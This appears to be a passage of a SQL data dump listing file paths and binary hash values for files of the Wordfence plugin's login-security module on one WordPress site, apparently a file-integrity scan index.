('—§Š…Ê“«åÅ&ÿÓ', 'wp-content/plugins/wordfence/modules/login-security/classes/utility/sleep.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/modules/login-security/classes/utility/sleep.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '§;Â¯^QÛè''³£¿°', 'gúænÅ\r«¡LÝaP¤½E˜‹ú²7|vR™Xð…›i', '', 0, '?'),
('ðKF$™2’èqHb<*>,', 'wp-content/plugins/wordfence/modules/login-security/classes/utility/url.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/modules/login-security/classes/utility/url.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'H\\Fô‹MP	•ì^ì™', 'Ð°STh•õ¯D¼â>wðDÄ\n})‚;TQ1­¥&É', '', 0, '?'),
('KB_ÚBÁb£	@%öU„', 'wp-content/plugins/wordfence/modules/login-security/css/admin-global.1712157296.css', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/modules/login-security/css/admin-global.1712157296.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '­Þ\nÌ!m]''ÂxË_·', 'ÓW‡”þI¯Y¢ÞTÃÄ¯Q².0(?ƒËF£™Ïf#|ÆM', '', 0, '?'),
('Ë4ÖdÌ¹¦ÐÓ„¿', 'wp-content/plugins/wordfence/modules/login-security/css/admin.1712157296.css', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/modules/login-security/css/admin.1712157296.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'JXlXÓ+þ…¿þé¬Û', ':©5JëpÅ¼ûå õ¡ŒW¹"Ðö›{Ozî©¦k', '', 0, '?'),
('§M¦ùî“}¥#ž57CHp', 'wp-content/plugins/wordfence/modules/login-security/css/colorbox.1712157296.css', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/modules/login-security/css/colorbox.1712157296.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '“<„»w\ri™ì»ŽvL*xÉ', 'ÍNÍbµƒ\rÌŽŠ/?+''åÄbi''úWâ$@€i\0', '', 0, '?'),
('ã©ˆðPŒNüù´À;w–', 'wp-content/plugins/wordfence/modules/login-security/css/embedded.1712157296.css', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/modules/login-security/css/embedded.1712157296.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'eæP€:¼}:^ñå–', '‘''ùÏÍ}-q8i¯Î²!1TFéàWÔÊ†ª‰\nÞê•', '', 0, '?'),
(':¸¯Ú¨I#ò\\f"î\Zœ6)', 'wp-content/plugins/wordfence/modules/login-security/css/font-awesome.1712157296.css', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/modules/login-security/css/font-awesome.1712157296.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'NÄùÀ2Jå¨³ýYBç˜±', '\ZP­Lã¨’ÍžZiÉt‘Aü§ä®ëãØ7d«', '', 0, '?'),
('.O¤7²}“è¡L?†¬©', 'wp-content/plugins/wordfence/modules/login-security/css/ionicons.1712157296.css', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/modules/login-security/css/ionicons.1712157296.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '*áÆ£Ù¿c;®Ûâz¾‹»', '¬èNôJ¾s´@Ñ3	š:h)•7Kò›<”\\Nü+', '', 0, '?'),
('\037kàY$’Õ''ô­', 'wp-content/plugins/wordfence/modules/login-security/css/jquery-ui.min.1712157296.css', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/modules/login-security/css/jquery-ui.min.1712157296.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '¾lÿ.´š(ëK‘pQÙð', '³Ù$rb=pÏh¹xËK£ù5]8ÇQþ§˜R‰¯jn4', '', 0, '?'),
('GûXZTƒët[Š', 'wp-content/plugins/wordfence/modules/login-security/css/jquery-ui.structure.min.1712157296.css', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/modules/login-security/css/jquery-ui.structure.min.1712157296.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '»)/4;ß$Û”åÞ¬vi\\', 'ŸnäèøÁàiÙë—…µNµvX¥7«Y]´…¼°D', '', 0, '?'),
('5\\:êpó/x—rÆ…jûf', 'wp-content/plugins/wordfence/modules/login-security/css/jquery-ui.theme.min.1712157296.css', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/modules/login-security/css/jquery-ui.theme.min.1712157296.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'kXøZb¸öØåª5Äê˜', '[\0Nù†²’EÀgð—ì¤Ñgd¶q\rÒí¿Úè*''IÂ', '', 0, '?'),
('F£uà:lKê>äj%rLG', 'wp-content/plugins/wordfence/modules/login-security/css/login.1712157296.css', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/modules/login-security/css/login.1712157296.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ZeBÏ–ajo‰®…˜™È', '_•j1\\Qîv“4À‚æ|²%i„të9×|:¤Fk4‰', '', 0, '?'),
('A©EÇRƒµäP¬dbuçkµ', 'wp-content/plugins/wordfence/modules/login-security/css/woocommerce-account.1712157296.css', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/modules/login-security/css/woocommerce-account.1712157296.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ôˆ°ÄOßÚ3‘6\r"5Ÿ', 'aÄb@/¥xý„Vî&·2ìb{Çx_G­™\0K¯', '', 0, '?'),
('o¿w*ö\nÎ›Î¢GÒœ]', 'wp-content/plugins/wordfence/modules/login-security/img/header.svg', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/modules/login-security/img/header.svg', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'pÜè±ÑÇ]êj-ã‘ø¦™', '8šü»ÔÚ#Ì„(8øáÿˆOû"Ç	+h"Fb–ìƒ', '', 0, '?'),
('Çñ}ÛC“wX•TC€û', 'wp-content/plugins/wordfence/modules/login-security/img/lightbox-controls.png', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/modules/login-security/img/lightbox-controls.png', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'm]¼a’¬•\\$É', 'Ç—’h?àïïSéîÍ)¸:›ÁÖi@h. X×g”†', '', 0, '?'),
('à\\1Ýƒâ%áVE|<Nµ°', 'wp-content/plugins/wordfence/modules/login-security/img/loading.gif', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/modules/login-security/img/loading.gif', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'K:û„²·õmð™—£P½', 'j*äeŽó©õdoX¤~§7Âë&€²‚Nü9É|L•Ç', '', 0, '?'),
('äèE?tB9b—vF`1', 'wp-content/plugins/wordfence/modules/login-security/img/loading_background.png', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/modules/login-security/img/loading_background.png', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '¬ô''é2û”p\nK‹X´ì', 'ÍÎŽ%XïÅ–F¼ÿçÜò1sÏ;ÀÎLëzrç’»', '', 0, '?'),
('%ÁfWñ‰…	ÖP0å}+', 'wp-content/plugins/wordfence/modules/login-security/img/menu.svg', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/modules/login-security/img/menu.svg', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'pÜè±ÑÇ]êj-ã‘ø¦™', '8šü»ÔÚ#Ì„(8øáÿˆOû"Ç	+h"Fb–ìƒ', '', 0, '?'),
('ÌMèÖëàzßÅ­Yºü®', 'wp-content/plugins/wordfence/modules/login-security/img/ui-icons_444444_256x240.png', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/modules/login-security/img/ui-icons_444444_256x240.png', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ØGÓJû‡u;QÔZ6ø½', 'ÿû…ß\\MUŒíKhQ¯wÀC©¶iÖV´î¢¹²ÎJ''', '', 0, '?'),
('žf ¬§rÅpÎ(—‹p $©', 'wp-content/plugins/wordfence/modules/login-security/img/ui-icons_555555_256x240.png', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/modules/login-security/img/ui-icons_555555_256x240.png', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'p¢ÔbDî@pýG+×±', '*DZÍ>ùBgñ&Y‰Yˆ›þ„Žâ¨4(<¨/', '', 0, '?'),
('JÕ¬4…ç\rànêÎç¦', 'wp-content/plugins/wordfence/modules/login-security/img/ui-icons_777620_256x240.png', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/modules/login-security/img/ui-icons_777620_256x240.png', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ëJ—\\c7’yþxÆÐ³l', '³~ÀÍqVšÂ¯¾*''Å1”¥¤š]3^‘öžÍÉm', '', 0, '?'),
('sáí¸4Œ ¢‘R¿X>OŽ', 'wp-content/plugins/wordfence/modules/login-security/img/ui-icons_777777_256x240.png', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/modules/login-security/img/ui-icons_777777_256x240.png', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'h…^n=(Š±&¡ñÝ‚¶N&', 'S²óDIBÿzÑ_-?(YÎãpE¥yûÆ¹A¡', '', 0, '?'),
('ãã¶H‘Š§„Ï%â÷Ú,ƒ¸', 'wp-content/plugins/wordfence/modules/login-security/img/ui-icons_cc0000_256x240.png', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/modules/login-security/img/ui-icons_cc0000_256x240.png', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '|¦%;w©ý¯Q»8øÈ@', 'wi>Þ6·Æ¬à4Èå .NÊC¹äž\Zÿ4ªIOžÙ', '', 0, '?'),
('¬bó0Ý€>jã¤"«þG', 'wp-content/plugins/wordfence/modules/login-security/img/ui-icons_ffffff_256x240.png', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/modules/login-security/img/ui-icons_ffffff_256x240.png', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'Aa+JD$ø2Ÿ‚J”Ú', '¬/#?Tï†iOLyv¦íuš˜TK”°©É¤½·\\Ø»õ', '', 0, '?'),
('JÌ~^ÍD.^ã@”', 'wp-content/plugins/wordfence/modules/login-security/js/admin-global.1712157296.js', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/modules/login-security/js/admin-global.1712157296.js', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '¯Ãq!èÃù\0ð­€ ''¥û', 'ØW´4$a¼öÜ''xôéà-¬ÔKÎ¼–#’Z¯ðü', '', 0, '?'),
('zAÝ²³ÉÉ¥ÚBktÞ’ ', 'wp-content/plugins/wordfence/modules/login-security/js/admin.1712157296.js', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/modules/login-security/js/admin.1712157296.js', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '1YÉa(Ä~ýD­4âXŒ<Ú', 'áÞm‰_½á–fg÷« ]B{#2\rAó³´b', '', 0, '?'),
('ýÅV»fåüMÇÃ¶bY®Þ', 'wp-content/plugins/wordfence/modules/login-security/js/chart.umd.1712157296.js', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/modules/login-security/js/chart.umd.1712157296.js', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'b?¨ú\\Ù°õYgD\rz', '¨‡éOdù Çõ:X×®ê RUÅ+ú@Éìþ9', '', 0, '?'),
('/ŽÌ,‰…<F«Ã§²', 'wp-content/plugins/wordfence/modules/login-security/js/jquery.colorbox.1712157296.js', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/modules/login-security/js/jquery.colorbox.1712157296.js', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'lYŸZöià¨† 3\02[', '(’åA#ïÀ¼F—þø~+¦Ÿ Fgh¡ðSŸ.ûb', '', 0, '?'),
('Øúx¾1Ë“dìšíÆD', 'wp-content/plugins/wordfence/modules/login-security/js/jquery.colorbox.min.1712157296.js', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/modules/login-security/js/jquery.colorbox.min.1712157296.js', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ôš¾ËlÀWeÔU{Ò9ü', 'ÜØéÌèäGû ßÙ8—=\0¨> ø3 wg3.¢4', '', 0, '?'),
(':·^ªÙõ@3ÒœÊ«µ¤=0', 'wp-content/plugins/wordfence/modules/login-security/js/jquery.qrcode.min.1712157296.js', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/modules/login-security/js/jquery.qrcode.min.1712157296.js', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ð±×Ô¹°´—Xp`me<', 'wP\0ØpÔzuYDSÞz(W ß¥‰ìP¾3$S‘öò‘', '', 0, '?'),
('O‹åläë††\r5·,íŒø', 'wp-content/plugins/wordfence/modules/login-security/js/jquery.tmpl.min.1712157296.js', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/modules/login-security/js/jquery.tmpl.min.1712157296.js', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '€\\}Ã"£†‹7Ú·’•DZ', 'ß.IôH\Z„g\0óH!7`‘£gÞ ZøzÈ„ƒÅ¾6|', '', 0, '?'),
('@Ìâ¡:¤Œð*zîÌÑÎì', 'wp-content/plugins/wordfence/modules/login-security/js/login.1712157296.js', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/modules/login-security/js/login.1712157296.js', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'nÝu÷£#IšºAÙ‘É·', '™ÞO™7`c2—PÀ¨ûæ>4›Ï\ZgOåž_°', '', 0, '?'),
('Ædtà€šS0›[\\Og:', 'wp-content/plugins/wordfence/modules/login-security/views/.htaccess', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/modules/login-security/views/.htaccess', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '…¼ÕA¾a¸bvrñ¤', 'C‡¾ö½''r…9½ì@âK¡Þ†t¡ª™öâ§w#@kº', '', 0, '?'),
('ÿÛï@~}c‡„ØQÝ''ƒ¿J', 'wp-content/plugins/wordfence/modules/login-security/views/common/modal-prompt.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/modules/login-security/views/common/modal-prompt.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '~»vYé×ÿ‡„ê½Š<ÇRv', 'ñux‰_ÆU(Å»0ä-Db9‡¨¢D5,3?÷½:æ¾f', '', 0, '?'),
('Ëqò›8à]C¤ÝËÖ”Õ', 'wp-content/plugins/wordfence/modules/login-security/views/common/reset-grace-period.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/modules/login-security/views/common/reset-grace-period.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'Yé¡-È®ÉÕq³Qx', 'ïË¯I@®Ã~ÂÂ£0sð;÷å\\åõ*êvÎwGŠ', '', 0, '?'),
('õx#¥„*W`PšÁÀDž', 'wp-content/plugins/wordfence/modules/login-security/views/common/revoke-grace-period.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/modules/login-security/views/common/revoke-grace-period.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', ':ô’’ÈokÍÜñƒ{Ø»', 'cA[›^¡rùD‰µ °Ô§xîr©Öðœô9;€', '', 0, '?'),
('jŠ´‰«pø\0ZÍò™', 'wp-content/plugins/wordfence/modules/login-security/views/email/login-verification.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/modules/login-security/views/email/login-verification.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'Æ<ƒ^·p…5ìâ±¿;', 'Z<OÏ°Íw¢HS8ÖîOø7''¦ÒØ÷š—ºìè³Y9H', '', 0, '?'),
('–#ynÛå½[hr\\ØU', 'wp-content/plugins/wordfence/modules/login-security/views/manage/activate.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/modules/login-security/views/manage/activate.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '3]>¤€ƒÄ^#“Ú;YÀ', 'ÍëOóìÿŠÎ‡Êµ]ðVË-ýàž™¬çÀnþ.', '', 0, '?'),
('©4†ø#Õ°¨}ï‹„¯£', 'wp-content/plugins/wordfence/modules/login-security/views/manage/code.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/modules/login-security/views/manage/code.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '»ð_õ¾¦29,HKÓØë', 'û¬í\0Ã˜>·$Y^!L¯€æ™še†z5¦Gó_E', '', 0, '?'),
('O‚æ½¼m$¸òž—Ý‹&_', 'wp-content/plugins/wordfence/modules/login-security/views/manage/deactivate.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/modules/login-security/views/manage/deactivate.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '¾«ºþ/¥ë¼M–aWÆ', 'ÓãdJ¬Š†[ÍÃéPÈÌrMÀ€V\ZµCÛmðâX£', '', 0, '?'),
('°wF¤òÈ¶ŒÛì‡# š', 'wp-content/plugins/wordfence/modules/login-security/views/manage/grace-period.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/modules/login-security/views/manage/grace-period.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'â¬e¬·×jë-¢úÝ=ó\n', 'ÎW˜OTÌ6W¥ð[Üºö\rª$ÀÀ´ùxùêþÛC®„^', '', 0, '?'),
('ã†#'' º~“ºÆç/z¶F', 'wp-content/plugins/wordfence/modules/login-security/views/manage/regenerate.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/modules/login-security/views/manage/regenerate.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ïÞêjÌòµÒ«%eó\0Ï»', '‰Ë-ßŸ&¤(:Õ4‚hÉ?©?Oñºr‘”‚`ŠøsHhê', '', 0, '?'),
('EéB3AÇÉô-\rÜ&!ÕT', 'wp-content/plugins/wordfence/modules/login-security/views/onboarding/standalone-header.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/modules/login-security/views/onboarding/standalone-header.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'Í“/qùõaê)^=f?Ÿäþ', '’Õ	§Ž¦­e?œzë¬õª–c™Z\nˆŽõ€œGâÃ', '', 0, '?'),
('·ÆsÝœ“Ãž3‡ŒÏôþ×', 'wp-content/plugins/wordfence/modules/login-security/views/options/option-captcha-threshold.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/modules/login-security/views/options/option-captcha-threshold.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '¹7&eôÆJ†Â¡³¦±ŸW', 'ï%ðp©ä¯˜‚88`ÄÿˆA@IW"jáÛÛÿ!U ', '', 0, '?'),
('ÈuåÙC~7\nèæôW³e×', 'wp-content/plugins/wordfence/modules/login-security/views/options/option-captcha.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/modules/login-security/views/options/option-captcha.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '£Kžëoó`„Æ—Uó«Â', 'ù„4Cò	·úx¤ÜßäÌ¶î¯Öú•Qù\n*—7¾ý', '', 0, '?'),
('mAÂpä×	1—ÞGõU/', 'wp-content/plugins/wordfence/modules/login-security/views/options/option-ip-source.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/modules/login-security/views/options/option-ip-source.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '“ŠØ‘4ºäŠ•Çx™™¤1V', '\Z|%\0ÂƒÄê^ÐÝxö³¿ç\nâü?¼º¬Ö¿÷x', '', 0, '?'),
('í§F–ôìÝ÷·mº¹¬', 'wp-content/plugins/wordfence/modules/login-security/views/options/option-label.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/modules/login-security/views/options/option-label.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'Û+Ê¸x5å3™‰zñ', '?¡Åaâ‹aÞU''9ÑÔ,é®ŸënžCá5Ú"6?É', '', 0, '?'),
('èb+Âù÷a©XÆÇâX', 'wp-content/plugins/wordfence/modules/login-security/views/options/option-ntp.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/modules/login-security/views/options/option-ntp.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '<S\n0èÉß¸?œŠC}O', '*\Z]aâ1L¦&èUî,¦ígæAptˆ¶¾@ñT', '', 0, '?'),
(';ëd+;¤C­€?ÇÿÝ', 'wp-content/plugins/wordfence/modules/login-security/views/options/option-roles.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/modules/login-security/views/options/option-roles.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ÅFÞ¿ðyÁ\0A^E=û', 'ÚŸ•Ý‘2it/ÙWûÝÚpÆ†ö÷0_,;Šµ', '', 0, '?'),
('þë‚\r?8[9€kQ''s', 'wp-content/plugins/wordfence/modules/login-security/views/options/option-select.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/modules/login-security/views/options/option-select.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ÜˆöŽ˜Vûi<ìAØ$É¤', '•»•µ4²„Õl¼æë’^=H‡®ÖaU/öÊü?', '', 0, '?'),
('º’Ïë2ÿÊ?!àuØÜ†"', 'wp-content/plugins/wordfence/modules/login-security/views/options/option-switch.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/modules/login-security/views/options/option-switch.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ÏIÍƒèCƒ''a@Èz‚ª', 'áOD=ÜÏ¾Cøhë³¼¨Yð!@á''fP%"&', '', 0, '?'),
('\Z&ô½cRà< FiCä', 'wp-content/plugins/wordfence/modules/login-security/views/options/option-text.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/modules/login-security/views/options/option-text.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ýp79Í71êiíƒ''', 'Z\n¯»A78{KpÈ÷ìîÓA#ÖæM|i’èÅ\r„¯ô', '', 0, '?'),
('òjñ\nj<Àcª@B‰X', 'wp-content/plugins/wordfence/modules/login-security/views/options/option-textarea.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/modules/login-security/views/options/option-textarea.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', ']}ÀÊ¥ÿñ§¡q¸\0', '9özö­ñ¡f#ä\Z–m×¯ÌÜRKˆ	·¥x%yi ', '', 0, '?'),
('þ¥I<½ÖÍUÂCMdZ¤', 'wp-content/plugins/wordfence/modules/login-security/views/options/option-toggled-boolean-switch.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/modules/login-security/views/options/option-toggled-boolean-switch.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'xšq°²š=°úo-É†J', '–ð\0š‚NÊ64gA¡¾Ü®H!‹^DÛ™ý›*¹ª¶Õ', '', 0, '?'),
('wDIš«-EòI×lå', 'wp-content/plugins/wordfence/modules/login-security/views/options/option-toggled-multiple.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/modules/login-security/views/options/option-toggled-multiple.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ÛÿïŸÖ»e4êÊŸµðE', '¡•ñ¦«4N+&ö:Ž<Y\Zt¥¬\ZùÅqÚ¡lÈY¡¹', '', 0, '?'),
('ÜFèª†\ruŽD¼b7', 'wp-content/plugins/wordfence/modules/login-security/views/options/option-toggled-segmented.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/modules/login-security/views/options/option-toggled-segmented.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'aè™MG<¿?v—''ªúD', '¨Yw”Ê1ôÇ\Z™ %Rar¢Õ¦¿±”ÔËvÕ\Za', '', 0, '?'),
('é|:«êxZ~±*×wlø', 'wp-content/plugins/wordfence/modules/login-security/views/options/option-toggled-select.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/modules/login-security/views/options/option-toggled-select.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '< ¤$0ËÛ2ª™Öš‘îN', 'Ê‘íK3NÎ@vµ[…áõÈLÌãeÝüÊÚµì±KÚ', '', 0, '?'),
('\rP÷)ž4_"»™''1', 'wp-content/plugins/wordfence/modules/login-security/views/options/option-toggled-sub.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/modules/login-security/views/options/option-toggled-sub.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'Q"¶Ÿ¬]‰=|²ÝA—_', 'kcØ¨Ê/Åë¨ê^<‚¥°q#HÒtQ‘ÿMVÂ×', '', 0, '?'),
('ð÷*æ²«žQó‡ÿ¥N', 'wp-content/plugins/wordfence/modules/login-security/views/options/option-toggled-textarea.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/modules/login-security/views/options/option-toggled-textarea.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ûn\0ìˆ]''];6¥‡', 'P¯[ ŸM\\pŸÔàÇH¬&Ì£ò\\ÿ^pËJ¾È', '', 0, '?'),
('Õ÷¢/—q‡RRÊ|¹¡ê', 'wp-content/plugins/wordfence/modules/login-security/views/options/option-toggled.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/modules/login-security/views/options/option-toggled.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ÃÇ÷~œâÞz„f8‹­•¶m', ';!™usßŠ`''4b¼p˜”8sblRZ{ºyÂ', '', 0, '?'),
('¬$´Q²sP¸¬êR3}/', 'wp-content/plugins/wordfence/modules/login-security/views/options/option-token.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/modules/login-security/views/options/option-token.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'Ž¡sU4…ÈÃæ«‹4[t', '°Ëãù_ŽjAÙC5íOylŒDU!ÿú\0’–¥À', '', 0, '?'),
('-–eceuà(¹­5I''«', 'wp-content/plugins/wordfence/modules/login-security/views/page/manage-embedded.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/modules/login-security/views/page/manage-embedded.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ÍhïË74\r¢ka\rP', 'Èµ¿‘6WÊ?¼ä¦ÄÔ¶uVÎ’Ùt>¼å¶µtõ', '', 0, '?'),
('ú†8î=šº‘Ç[Õ±ƒ', 'wp-content/plugins/wordfence/modules/login-security/views/page/manage.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/modules/login-security/views/page/manage.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'H\\nö''ÿø}­.KsG', 'W/®\\}ˆø°¯)ù*bÓzi¶ªÕo÷óØ±‡Ñ·õ', '', 0, '?'),
('C‘»ÔIþ»ÞS7ï<', 'wp-content/plugins/wordfence/modules/login-security/views/page/page.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/modules/login-security/views/page/page.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'Ð¨>\\g®ÉÇ¡á$«ÌcÆ', 'Ê÷„ii¶›G«CªÏÅéN€FLÎ)7%Ê™æ', '', 0, '?'),
('[9üJ=\nuE\0O\n\\P°Ð', 'wp-content/plugins/wordfence/modules/login-security/views/page/permission-denied.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/modules/login-security/views/page/permission-denied.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ôÎº2Êè}ÖðæÂËïøÂ', '[,ºð—<XîYyyí~EÉJøZ?6Ù\r~´ÿ×©°÷æë', '', 0, '?'),
('ttÌ¸íTé.ï¡*Ã³U˜', 'wp-content/plugins/wordfence/modules/login-security/views/page/role.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/modules/login-security/views/page/role.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '“/e÷ðŸÚ\0$’ýÌ÷Õ°', 'rRÄ>ïzDtÿï›Ïõûë“ÏWççoÕŸÙ¨Eè±', '', 0, '?'),
